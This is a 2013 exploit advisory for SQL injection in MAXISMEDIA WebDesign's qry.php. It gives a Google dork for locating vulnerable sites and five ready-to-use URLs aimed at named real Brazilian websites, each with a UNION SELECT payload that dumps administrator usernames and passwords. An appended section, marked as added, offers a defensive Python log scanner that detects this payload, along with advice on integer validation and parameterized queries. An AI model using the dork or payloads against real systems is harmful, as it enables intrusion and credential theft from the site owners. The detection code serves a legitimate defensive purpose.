
MAXISMEDIA WebDesign SQL Injection Vulnerability

Author: TUNISIAN CYBER, Published: 05-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: MAXISMEDIA WebDesign SQL Injection Vulnerability
[+] Date: 05-12-2013
[+] Category: WebApp
[+] Google Dork: intext:"MAXISMEDIA" qry.php?id=
[+] Tested on: Win7, Ubuntu 13.04


########################################################################################


proof:
127.0.0.1/[path]/qry.php?id=

Demos:
http://bebedourosecia.com.br/qry.php?id=12+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.maxisbox.com.br/esplanada/esplanada/qry.php?id=2+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.societygauchao.com.br/qry.php?id=1+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.fanfarra.com.br/qry.php?id=1+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
http://www.bhvideo.com.br/2010/qry.php?id=1+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao--
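
Added example (not part of the original advisory): a log check for the request pattern shown above, flagging any qry.php request whose id parameter is not a plain integer and marking UNION SELECT attempts. The log lines, client addresses and function names are constructed for illustration; only qry.php, id and the nome/senha/administracao names come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client IPs are documentation-range placeholders.
SAMPLE_LOG = '''\
198.51.100.7 - - [05/Dec/2013:10:01:02 +0000] "GET /qry.php?id=12 HTTP/1.1" 200 5120
198.51.100.9 - - [05/Dec/2013:10:02:10 +0000] "GET /qry.php?id=12+and+1=2+union+select+1,2,3,4,5,Group_concat%28nome,0x3a,senha%29+From+administracao-- HTTP/1.1" 200 734
198.51.100.9 - - [05/Dec/2013:10:02:40 +0000] "GET /site/qry.php?id=2%20UnIoN/**/SeLeCt%201 HTTP/1.1" 200 512
203.0.113.4 - - [05/Dec/2013:10:03:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900
203.0.113.4 - - [05/Dec/2013:10:03:05 +0000] "GET /qry.php?id=7' HTTP/1.1" 500 120
'''

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.I | re.S)

def classify_id(value):
    """Return None for a plain integer id, otherwise the reason it was flagged."""
    if re.fullmatch(r'\d{1,10}', value):
        return None
    # Inline SQL comments are a common way to split keywords; drop them first.
    normalized = SQL_COMMENT_RE.sub(' ', value)
    if UNION_RE.search(normalized):
        return 'union-select'
    return 'non-numeric'

def scan(log_text, script='qry.php', param='id'):
    """Return (client, reason, decoded value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith('/' + script):
            continue
        # parse_qs URL-decodes the value ('+' becomes a space, %28 becomes '(').
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify_id(value)
            if reason:
                findings.append((client, reason, value))
    return findings

if __name__ == '__main__':
    for client, reason, value in scan(SAMPLE_LOG):
        print(client, reason, value)
```

The same integer-only check, enforced in the application before the value reaches the query and combined with a parameterized statement, removes the injection itself rather than just detecting it.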


########################################################################################
Greets to: XmaxTn, XtechSet, N43iL Hack3e
########################################################################################
